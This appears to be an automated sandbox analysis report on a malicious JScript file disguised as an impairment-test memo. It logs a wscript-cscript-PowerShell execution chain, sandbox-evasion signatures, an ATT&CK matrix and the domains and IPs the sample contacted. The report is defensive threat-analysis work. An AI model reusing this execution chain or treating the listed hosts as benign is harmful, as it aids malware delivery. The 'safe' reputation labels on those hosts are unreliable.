Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cscript.exe cscript AUTOMO~1.JSJump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cscript.exe cscript AUTOMO~1.JSJump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershellJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting
Valid Accounts1
Windows Management Instrumentation
12
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping2
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
11
Virtualization/Sandbox Evasion
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution
1
Office Application Startup
1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
DLL Side-Loading
Login Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577279 Sample: Memo - Impairment Test 2023... Startdate: 18/12/2024 Architecture: WINDOWS Score: 76 39 www.anifowoshe.com 2->39 41 wickandjuice.co.za 2->41 43 8 other IPs or domains 2->43 59 Sigma detected: WScript or CScript Dropper 2->59 61 Sigma detected: WScript or CScript Dropper - File 2->61 10 wscript.exe 2 2->10         started        14 wscript.exe 1 1 2->14         started        16 wscript.exe 2->16         started        signatures3 process4 file5 37 C:\Users\user\...\Automotive Equipment.js, ASCII 10->37 dropped 65 JScript performs obfuscated calls to suspicious functions 10->65 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->67 69 Suspicious execution chain found 10->69 71 Potential evasive JS / VBS script found (domain check) 10->71 18 conhost.exe 14->18         started        20 conhost.exe 16->20         started        signatures6 process7 process8 22 cscript.exe 1 1 18->22         started        24 cscript.exe 1 20->24         started        process9 26 powershell.exe 7 22->26         started        29 powershell.exe 24->29         started        signatures10 63 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 26->63 31 powershell.exe 14 49 26->31         started        35 powershell.exe 29->35         started        process11 dnsIp12 45 wickandjuice.co.za 129.232.136.170, 443, 49716, 49720 xneeloZA South Africa 31->45 47 acceleratedigital.com.au 172.105.162.7, 443, 49714, 49731 LINODE-APLinodeLLCUS United States 31->47 49 www.anifowoshe.com 67.205.27.249, 443, 49718, 49734 DREAMHOST-ASUS United States 31->49 57 Loading BitLocker PowerShell Module 31->57 51 thezoneheights.co.za 197.189.243.212, 443, 49723, 49737 xneeloZA South Africa 35->51 53 pensuni.com 88.218.116.137, 443, 49719, 49747 UPRESS-DRBIL Israel 35->53 55 5 other IPs or domains 35->55 signatures13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Memo - Impairment Test 2023 MEX010B (5).js0%VirustotalBrowse
Memo - Impairment Test 2023 MEX010B (5).js0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://sizzlejs.com/0%Avira URL Cloudsafe
http://bugs.jquery.com/ticket/123590%Avira URL Cloudsafe
https://wickandjuice.co.za/0%Avira URL Cloudsafe
https://pensuni.com/0%Avira URL Cloudsafe
https://acceleratedigital.com.au/0%Avira URL Cloudsafe
https://thezoneheights.co.za/0%Avira URL Cloudsafe
https://promisesaplus.com/#point-590%Avira URL Cloudsafe
https://bugs.webkit.org/show_bug.cgi?id=1368510%Avira URL Cloudsafe
https://www.anifowoshe.com/wordpress/0%Avira URL Cloudsafe
https://promisesaplus.com/#point-570%Avira URL Cloudsafe
http://bugs.jquery.com/ticket/133780%Avira URL Cloudsafe
http://jsperf.com/thor-indexof-vs-for/50%Avira URL Cloudsafe
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript0%Avira URL Cloudsafe
http://jsperf.com/getall-vs-sizzle/20%Avira URL Cloudsafe
http://dev.w3.org/csswg/cssom/#resolved-values0%Avira URL Cloudsafe
https://saeedmdcat.com/0%Avira URL Cloudsafe
https://promisesaplus.com/#point-540%Avira URL Cloudsafe
https://promisesaplus.com/#point-750%Avira URL Cloudsafe
https://bugs.webkit.org/show_bug.cgi?id=290840%Avira URL Cloudsafe
https://werrrk.com/0%Avira URL Cloudsafe
http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html0%Avira URL Cloudsafe
https://skagitorganics.net/0%Avira URL Cloudsafe
https://promisesaplus.com/#point-610%Avira URL Cloudsafe
https://promisesaplus.com/#point-480%Avira URL Cloudsafe
https://alseraj.net/0%Avira URL Cloudsafe
https://promisesaplus.com/#point-640%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
thezoneheights.co.za
197.189.243.212
truefalse
    unknown
    pydata.org
    104.26.1.204
    truefalse
      high
      saeedmdcat.com
      194.163.167.35
      truefalse
        unknown
        www.anifowoshe.com
        67.205.27.249
        truefalse
          unknown
          wickandjuice.co.za
          129.232.136.170
          truefalse
            unknown
            werrrk.com
            66.198.240.43
            truefalse
              unknown
              pensuni.com
              88.218.116.137
              truefalse
                unknown
                alseraj.net
                104.21.10.224
                truefalse
                  unknown
                  acceleratedigital.com.au
                  172.105.162.7
                  truefalse
                    unknown
                    skagitorganics.net
                    141.193.213.10
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://www.anifowoshe.com/wordpress/false
                      • Avira URL Cloud: safe
                      unknown
                      https://acceleratedigital.com.au/false
                      • Avira URL Cloud: safe
                      unknown
                      https://thezoneheights.co.za/false
                      • Avira URL Cloud: safe
                      unknown
                      https://pydata.org/false
                        high
                        https://wickandjuice.co.za/false
                        • Avira URL Cloud: safe
                        unknown
                        https://pensuni.com/false
                        • Avira URL Cloud: safe
                        unknown
                        https://werrrk.com/false
                        • Avira URL Cloud: safe
                        unknown
                        https://saeedmdcat.com/false
                        • Avira URL Cloud: safe
                        unknown
                        https://skagitorganics.net/false
                        • Avira URL Cloud: safe
                        unknown
                        https://alseraj.net/false
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://bugs.webkit.org/show_bug.cgi?id=136851wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
